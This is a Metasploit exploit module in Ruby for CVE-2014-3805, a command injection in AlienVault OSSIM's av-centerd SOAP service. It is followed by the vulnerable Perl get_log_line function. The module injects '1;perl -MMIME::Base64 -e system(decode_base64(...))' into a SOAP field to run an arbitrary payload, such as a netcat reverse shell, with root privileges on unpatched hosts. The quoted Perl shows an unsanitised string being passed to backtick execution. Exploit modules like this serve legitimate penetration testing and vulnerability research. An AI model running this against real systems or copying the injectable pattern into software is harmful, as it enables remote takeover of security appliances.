require 'msf/core'
require 'rexml/document'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
    include REXML
 
    def initialize(info = {})
        super(update_info(info,
            'Name'      => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
            'Description'   => %q{
                This module exploits a command injection flaw found in the get_log_line
                function found within Util.pm. The vulnerability is triggered due to an
                unsanitized $r_file parameter passed to a string which is then executed
                by the system
            },
            'Author' => [ 'james fitts' ],
            'License' => MSF_LICENSE,
            'References' =>
                [
                    [ 'CVE', '2014-3805' ],
                    [ 'OSVDB', '107992' ]
                ],
            'Privileged'    => true,
            'Platform'      => 'unix',
            'Arch'          => ARCH_CMD,
            'DefaultOptions' =>
                {
                    'SSL' => true,
                },
            'Payload' =>
                {
                    'Compat'    => {
                        'RequiredCmd'   => 'perl netcat-e openssl python gawk'
                    }
                },
            'DefaultTarget' => 0,
            'Targets' =>
                [
                    ['Alienvault <= 4.7.0',{}]
                ],
            'DisclosureDate' => 'Jul 18 2014'))
 
            register_options([Opt::RPORT(40007)], self.class)
    end
 
    def check
        version = ""
        res = send_soap_request("get_dpkg")
 
        if res &&
            res.code == 200 &&
            res.headers['SOAPServer'] &&
            res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
            res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
 
            version = $1
        end
 
        if version.empty? || version >= "4.7.0"
            return Exploit::CheckCode::Safe
        else
            return Exploit::CheckCode::Appears
        end
    end
 
    def build_soap_request(method)
        xml = Document.new
        xml.add_element(
            "soap:Envelope",
            {
                "xmlns:xsi"             => "http://www.w3.org/2001/XMLSchema-instance",
                "xmlns:soapenc"         => "http://schemas.xmlsoap.org/soap/encoding/",
                "xmlns:xsd"             => "http://www.w3.org/2001/XMLSchema",
                "soap:encodingStyle"    => "http://schemas.xmlsoap.org/soap/encoding/",
                "xmlns:soap"            => "http://schemas.xmlsoap.org/soap/envelope/"
            })
 
        body = xml.root.add_element("soap:Body")
        m = body.add_element(method, { 'xmlns'  => "AV/CC/Util" })
 
        args = []
        args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
        args[0].text = "All"
 
        args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
        args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
 
        args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
        args[2].text = "#{datastore['RHOST']}"
 
        args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
        args[3].text = "#{rand_text_alpha(4 + rand(4))}"
 
        args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
        args[4].text = "/var/log/auth.log"
 
        args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
        perl_payload =  "system(decode_base64"
        perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
        args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
 
        xml.to_s
    end
 
    def send_soap_request(method, timeout=20)
        soap = build_soap_request(method)
 
        res = send_request_cgi({
            'uri'       => '/av-centerd',
            'method'    => 'POST',
            'ctype'     => 'text/xml; charset=UTF-8',
            'data'      => soap,
            'headers'   => {
                'SOAPAction'    => "\"AV/CC/Util##{method}\""
            }
        }, timeout)
 
        res
    end
 
    def exploit
        send_soap_request("get_log_line", 1)
    end
end
__END__
 
/usr/share/alienvault-center/lib/AV/CC/Util.pm
 
sub get_log_line {
        my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
        = @_;
 
    verbose_log_file(
        "GET LOG LINE  : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
    );
 
    my @ret = ("$systemuuid");
 
    if ( $r_file =~ /\.\./ ){
                        push(@ret,"File not auth");
                        return \@ret;
        }
 
        if ( $number_lines <= 0) {
                        push(@ret,"Error in number lines");
                        return \@ret;
        }
 
    if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
                        if (! -f "$r_file" ){
                                push(@ret,"File not found");
                                return \@ret;
                        }
                        push(@ret,"ready");
 
                        my $command = "tail -$number_lines $r_file";
                        #push(@ret,"$command");
                        #my @content = `tail -$number_lines $r_file`;
                        my @content = `$command`;
                        push(@ret,@content);
                        return \@ret;
        }
    else {
                push(@ret,"path not auth");
                return \@ret;
        }
}